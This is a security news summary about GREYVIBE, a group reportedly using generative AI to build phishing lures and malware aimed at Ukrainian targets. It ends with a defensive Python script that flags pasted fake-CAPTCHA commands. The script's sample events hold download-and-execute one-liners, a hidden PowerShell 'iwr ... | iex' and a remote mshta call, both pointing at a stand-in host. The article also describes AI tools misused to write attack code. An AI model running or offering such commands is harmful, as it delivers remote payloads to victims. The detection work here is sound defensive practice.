Attack Campaign Overview
A cyber threat group tracked as GREYVIBE has been actively using generative AI platforms such as ChatGPT and Google Gemini to enhance its attack operations since at least August 2025. The campaign primarily targets government, military, and civilian entities in Ukraine. Researchers from WithSecure identified GREYVIBE as a previously unknown group with consistent infrastructure and operational patterns across multiple campaigns. While no definitive attribution has been made, the group's activities align with Russian state interests, particularly intelligence gathering related to the Russia-Ukraine conflict. Evidence includes Russian-language artifacts, activity during Moscow time zone hours, and targeting of Ukrainian institutions.
How GREYVIBE Uses AI and Attack Tactics
GREYVIBE employs a multi-vector strategy combining spear-phishing emails, fake CAPTCHA verification pages, and fraudulent websites to distribute malware. In spear-phishing campaigns, attackers impersonate Ukrainian government agencies and distribute malicious archives through cloud services like Google Drive. These payloads open decoy documents while initiating infection chains with custom loaders. Another tactic involves fake CAPTCHA pages that trick victims into executing malicious commands under the guise of verification. The group also operates deceptive adult club websites targeting Ukrainian individuals, including military personnel, to deliver malware such as FallSpy for Android and PhantomRelay for Windows.
Generative AI is used throughout the attack lifecycle. Tools like ChatGPT, Google Gemini, and Ideogram AI are used to generate phishing lures, develop malware components, and support post-compromise activities. Researchers found AI-generated code patterns in obfuscators and loaders such as DAYLIGHT and TEASOUP, as well as in the development of LegionRelay, a custom PowerShell-based remote access trojan.
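As an added example (not from the WithSecure report or this page), the following Python check illustrates how a defender might hunt for the behaviour the fake-CAPTCHA tactic depends on: a command shell launched by the user from Explorer (the Run dialog path) with a hidden-window, encoded, or download-and-execute command line. The event fields, sample log lines and heuristics are constructed assumptions for illustration, not indicators from the campaign.

```python
import re

# Constructed sample process-creation events, roughly in the shape an EDR
# would emit. None of these values come from the GREYVIBE report.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/v | iex"'},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"id": 3, "parent": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh -File build.ps1"},
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /c "mshta http://example.invalid/captcha.hta"'},
]

# Interpreters a pasted "verification" command typically lands in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Hallmarks of a user-pasted one-liner (illustrative heuristics, tune per estate).
HEURISTICS = {
    "hidden_window": re.compile(r"-(w|win|windowstyle)\s+hidden", re.I),
    "encoded_command": re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_url": re.compile(r"\b(iwr|invoke-webrequest|curl|wget|mshta)\b.*https?://", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def flag_user_pasted_commands(events):
    """Return (event id, matched heuristic names) for shells spawned directly
    from explorer.exe whose command line matches at least one heuristic."""
    flagged = []
    for ev in events:
        if basename(ev["parent"]) != "explorer.exe" or basename(ev["image"]) not in SHELLS:
            continue
        hits = [name for name, rx in HEURISTICS.items() if rx.search(ev["cmdline"])]
        if hits:
            flagged.append((ev["id"], hits))
    return flagged


if __name__ == "__main__":
    for event_id, hits in flag_user_pasted_commands(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

The parent-process filter is the key piece: a shell whose parent is explorer.exe with no interactive console is exactly what a "paste this into Win+R" lure produces, and it is rare in legitimate administrative use.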
Source: Cyber Security News